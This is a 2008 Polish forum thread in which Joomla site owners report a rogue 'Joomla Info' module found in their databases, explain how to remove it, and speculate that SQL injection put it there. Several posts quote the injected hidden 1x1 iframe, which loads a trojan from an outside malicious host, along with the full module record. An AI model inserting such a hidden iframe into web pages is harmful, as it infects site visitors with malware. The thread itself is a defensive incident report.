PDA

Zobacz pełną wersję : Aktualizacja z trojanem



tedi
18-01-2008, 23:31
Po aktualizacji Joomla! 1.0.11 do 1.0.13 (z polskim panelem administracyjnym) na liście modułów witryny pojawił się opublikowany Joomla Info. Przed aktualizacją go w serwisie nie było.
Może to zbieg okoliczności, ale od tego momentu przy każdym wejściu do serwisu, IE7 zaczął odwoływać się do jakiejś podejrzanej strony. W źródle strony pojawił się taki zapis:

<!-- Traffic Statistics -->
<p><iframe width="1" height="1" frameborder="0" src="http://www.wp-stats-php.info/iframe/wp-stats.php"></iframe></p>
<!-- End Traffic Statistics -->

Jeśli moduł Joomla Info z tym kodem jest opublikowany w naszym serwisie, to każdy odwiedzający serwis za pomocą IE zostaje przekierowany do niebezpiecznej strony (http://www.wp-stats-php.info/iframe/wp-stats.php), z której na dysk do jednego z tymczasowych katalogów:
C:\Documents and Settings\..uzytkownik..\Ustawienia lokalne\Temporary Internet Files\Content.IE5\..katalogi tymczasowe oznaczone cyframi i literami..
umieszczony zostaje złośliwy plik: wp-stats[1].php, zawierający trojana w kodzie java.
Wirus - trojan od 3 stycznia 2008r. wykrywany jest przez antywirusa Kaspersky, albo ZoneAlarm.

Aby to wyeliminować należy:

wejść w panel administratora
Moduły - witryna
Lista modułów [Witryna]
i usunąć: Joomla Info

zwiastun
19-01-2008, 00:45
A skąd Ci się coś takiego znalazło w instalce Joomla? Skąd ją pobierałeś? Bo w instalkach z Joomla.pl takiego śmiecia nie ma!

tedi
19-01-2008, 09:38
Jako przeglądarki na co dzień używam FireFoxa. Ona nie aktywuje tego odwołania do niebezpiecznej strony. Stąd dopiero w tym tygodniu przypadkowo po uruchomieniu IE7 i wejściu na własną stronę zauważyłem komunikat o potrzebie instalacji kontrolki do IE7. Odruchowo ją zainstalowałem, bo nie spodziewałem się, że coś niedobrego mnie spotka od „mojej” Joomli. Każdą operację na serwerze poprzedzam czyszczeniem systemu koniecznymi programami, by nie zasiać jakiegoś niepożądanego śmiecia.
I od tej chwili wejście na stronę przy pomocy IE7 powodowało aktywację antywirusa.

Przed aktualizacją 18.10.2007 r. na serwerze Joomli z 11 do 13, pobranej 16.08.2007 z joomla.pl (plik - joomla_1.0.13 JIE iso.zip) kilkanaście dni testowałem działanie mojej strony na localhost z XAMPP. Potem, gdy wszystko hulało bez problemów (aktualizacja nie powodowała żadnych problemów, bo stronę mam dość prostą) zamieniłem Joomlę na serwerze.
Możliwe, że w czasie testowania "udało mi się" zawirusować bazę SQL, tylko że ta na serwerze, z tą na localhost, nie ma nic wspólnego. Bazy SQL na serwerze, gdzie mam Joomlę nie zmieniałem, a to wszystko dzieje się właśnie tylko w SQL-u. Z serwera tylko importuję bazę SQL przed dokonywaniem operacji aktualizacyjnych i do treningów na XAMPP. Stąd dość precyzyjnie mogę podać, kiedy ten niepożądany wpis się pojawił. Baza po aktualizacji 18.10.2007 r. już go miała, przedtem nie.

Ale ciekawa sprawa - po usunięciu w Administratorze niechcianego modułu "Joomla Info", kompletnie nic się nie zmienia w katalogu Joomla. Jest dokładnie taki sam, nawet daty wszystkich plików są takie same, jak przed usunięciem. Ginie tylko w SQL ten jeden wpis. Sprytne. Bo nie można łatwo ustalić, co wywołuje przekierowanie do niebezpiecznej strony. Joomla jest czysta.
Pytanie tylko, jak dokonała się niepożądana zmiana w bazie SQL?

Napisałem, że może to przypadek. Ale ponieważ podczas walki z tym virusem w kilku miejscach czytałem, że: "macie na stronie trojana ...., bo antyvirus mi blokuje dostęp do waszej strony" podzieliłem się swymi doświadczeniami, może one pomogą innym z takim samym kłopotem.

Uszanowanie dla Zwiastuna.

zwiastun
19-01-2008, 11:31
Dzięki za usz
dla mnie rzecz nadal dziwna. Czy mógłbyś pobrać paczki joomla i przeskanować u siebie. Ostatni miesiąc - to skanowanie mojego kompa już bodaj 4 czy 5 antywirusem, pliki pakietów joomla czyściutkie jak dupcia niemowlęcia po kąpieli, ale może żaden antywir się nie poznał, a ani jednego, ani drugiego nie mam

tedi
19-01-2008, 15:39
Prawdopodobnie tłumacząc co się działo, zbyt wszystko uprościłem.
Otóż w Administratorze Joomli pojawił się moduł ”Joomla Info” w dniu aktualizacji strony na serwerze z wersji 11 do 13. Jestem pewny tego, bo przed i po aktualizacji wyeksportowałem zawartość SQL. W bazie SQL przed aktualizacją tego modułu nie było. Może właśnie w tym czasie ktoś zaatakował moją bazę SQL na serwerze i jest to zbieg okoliczności.
Dotychczas sądziłem, że bez zgody administratora nie da się tworzyć nowych modułów w Joomli. Teraz tego nie jestem pewien, bo ten szkodliwy - „Joomla Info” chyba tak powstał. Miał nadany kolejny ID i figurował jako moduł Typ - „Użytkownik”, a ponieważ nazwa „Joomla Info” wzbudzała zaufanie, to poszukując sprawcy kłopotów, usuwałem po kolei wszystkie komponenty, booty i moduły, a ten dopiero na końcu. I nagle zdumienie – to jest winowajca.
Usunięcie przy pomocy panelu Administratora modułu „Joomla Info” nie powoduje żadnych(!) zmian na serwerze w plikach katalogu joomla. Wniosek - to nie instalka (aktualizacja) Joomli jest zawirusowana. Szczotkowałem wszystkie instalki oraz wchodzące i wychodzące pliki na serwer i nic. On sobie tkwił w bazie SQL. Bazy nie zmieniałem na serwerze od postawienia Joomli 1.0.11 oprócz „porządkowania” z panelu administracyjnego SQL, więc chyba nie mogłem być sprawcą pojawienia się w niej tego wpisu.
Zapis w „zawirusowanej” bazie SQL-u był taki:
w ostatnim rekordzie w sekcji moduls były następujące wpisy:

id 60
title Joomla Info
content <!-- Traffic Statistics --> <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
ordering 11
position left
checked_out 0
checked_out_time 0000-00-00 00:00:00
published 1
module
numnews 0
access 0
showtitle 0
params moduleclass_sfx=-ysveqb
cache=0
firebots=0
rssurl=
rsstitle=0
rssdesc=0
rssimage=0
rssitems=0
rssitemdesc=0
word_count=0
rsscache=3600

Istnienia tego wpisu w bazie nie wykrywa żaden antywirus.
Uruchomienie IE7 powoduje, że moduł "Jomla Info" wymusza zassanie wp-stats[1].htm, który zawiera kod trojana. I ten plik wchodząc na dysk wywołuje alarm antywirusa. Musiałbym przywrócić na serwerze bazę z tym śmieciem, aby zademonstrować pojawianie się wirusa, bo na lokalnym XAMPP i z bazą SQL zawierającą ten moduł, uruchamiając stronę w IE7 nic się nie dzieje.

Raffael
25-01-2008, 03:43
u mnie identyczna sytuacja - tyle, ze mam 1.0.12 i nie przechodzilem na 1.0.13... wczesniej tego nie bylo, jakis czas temu zauwazyli sami uzytkownicy. I rowniez modul Joomla Info, tez ten sam trojanik...

tedi
25-01-2008, 11:55
Widocznie umieszczenie trojana odbywa się przez jakąś lukę. Może któryś z komponentów jest „nieszczelny”, albo trzeba znaleźć sposób na ochronę bazy SQL. Jest to zachęta dla innych, by zaglądnęli, czy nie mają modułu „Joomla Info”.

Raffael
25-01-2008, 19:13
Zastanawiam się czy przez ataki SQL Injection można coś dodać do bazy bo to że wyciągnąć dane to wiem...

leonidas
04-02-2008, 23:33
Dzięki chłopaki za ten temacik, bo u mnie też ten śmieć joomla info istniał, na szczęście już go wywaliłem, także przez przypadek zauważyłem otwierając strone w dziurawej jak sito IE ze wyskakuje jaki scrypcik wp-stat.

pozdrawiam